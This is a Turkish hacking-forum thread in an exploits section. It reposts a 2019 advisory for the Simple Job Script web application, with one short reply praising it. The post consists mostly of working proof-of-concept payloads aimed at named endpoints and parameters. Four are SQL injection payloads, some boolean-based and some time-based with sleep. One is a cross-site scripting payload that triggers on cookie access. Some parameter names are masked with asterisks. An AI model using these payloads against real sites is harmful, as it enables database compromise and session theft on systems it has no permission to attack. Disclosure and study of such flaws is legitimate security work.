İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

SJS Simple Job Script - SQL Injection / Cross-Site Scripting

26-03-2019 20:32
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
653
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Ticaret:
(0) %
# Exploit Başlığı: Simple Job Script - Multiple Vulnerabilities
# Date/Tarih: 26.03.2019
# Exploit Author/Exploit Yazarı: Ahmet Ümit BAYRAM
# Vendor Homepage/Yapımcı Anasayfa: https://simplejobscript.com/
# Download Link/Yazılım İndirme Linki:
https://github.com/niteosoft/simplej...ive/master.zip
# Demo Site: https://demo.simplejobscript.com
# Version/Versiyon: Lastest/En son
# Tested on/Test Edilen Sistem: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/searched
Vulnerable Parameter: landing_******** (POST)
Payload:
landing_********=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test



----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/get_job_applications_ajax.php
Vulnerable Parameter: job_id (POST)
Payload: job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/register-recruiters
Vulnerable Parameter: employerid (POST)
Payload: if(now()=sysdate(),sleep(0),0)


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/delete_application_ajax.php
Vulnerable Parameter: app_id (POST)
Payload:
app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(se lect(0)from(select(sleep(0)))v)%2B"*/


----- PoC 5: XSS -----

Request:
http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_********_val[]=fulltime_ctype
Vulnerable Parameter: job_type_value[] (GET)
Payload: "><svg+onload%3Dalert(********.cookie)>
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE


26-03-2019 20:47
#2
supremes - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2018
Nereden:
Öteki taraf
Mesajlar:
1.282
Teşekkür (Etti):
16
Teşekkür (Aldı):
92
Konular:
92
Ticaret:
(0) %
Gerçekten emek var, helal olsun
Kullanıcı İmzası
█║▌│█│║▌║││█║▌║▌║

© Copyrigt 1995-2019

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı